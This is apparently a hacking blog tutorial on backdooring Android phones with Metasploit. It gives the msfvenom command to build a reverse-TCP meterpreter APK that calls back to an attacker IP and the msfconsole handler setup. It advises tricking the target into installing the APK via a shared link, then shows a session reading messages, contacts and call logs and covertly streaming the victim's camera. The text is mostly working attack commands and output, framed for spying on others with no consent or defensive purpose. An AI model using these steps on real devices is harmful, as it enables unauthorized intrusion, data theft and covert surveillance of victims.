Android is the most popular mobile platform, and as its user base grows day by day, so do the security threats. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in Kali Linux for generating and handling a payload. Metasploit has more than 1000 exploits, which is more than enough. Here we use Metasploit to hack Android. We will create a backdoor package using msfvenom. Executing the APK on the target device will give you a reverse meterpreter shell.


1. Metasploit framework


It's pre-installed in Kali. If you don't find it, download and install it with the following command:


# apt-get install metasploit-framework


Generating Payload (.apk)

Normally we use the msfpayload command to generate a payload; since Kali 2.0, msfvenom is used instead of msfpayload.

# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST="attacker IP" LPORT=444 -o /root/Desktop/payload.apk


An APK will be generated on the desktop. The attacker IP can be your local IP, but if the target is on a WAN (anywhere on the internet), provide your external IP and forward port 444 on your router.

Want to know how Android is hacked over dynamic DNS via WAN? Follow this thread on askthehackers.com: https://www.askthehackers.com/20/how-to-inject-an-apk-file-into-another-device-remotely

# msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST= LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk


Setting up reverse handler

Now start the msf reverse handler on your Kali machine. Fire up Metasploit:

# msfconsole

Wait for a minute; msfconsole will come up. Then use the handler and set the payload and options.

1. Handler

msf> use multi/handler

2. Set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST "attacker ip"

5. Exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


Executing the payload on Target

To make a reverse connection you have to execute the payload on the target device. If you have direct access to the target device, copy the APK that you created and install it. Otherwise, upload it to a server, share the link, and have the target install the APK.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-12-08 04:50:59 -0500
meterpreter >

Now you can read messages, contacts and the call log, access the camera and mic, and upload and download files.

Use the help command for more options:

meterpreter > help

The most interesting part, which I like, is spying on the camera.


meterpreter > webcam_stream

With this command you get a live stream from the main camera. Even though the frame rate is low, you can spy on them like in a James Bond movie. You can also spy on the front camera or the secondary camera with the command:


meterpreter > webcam_stream 2

Happy hacking!

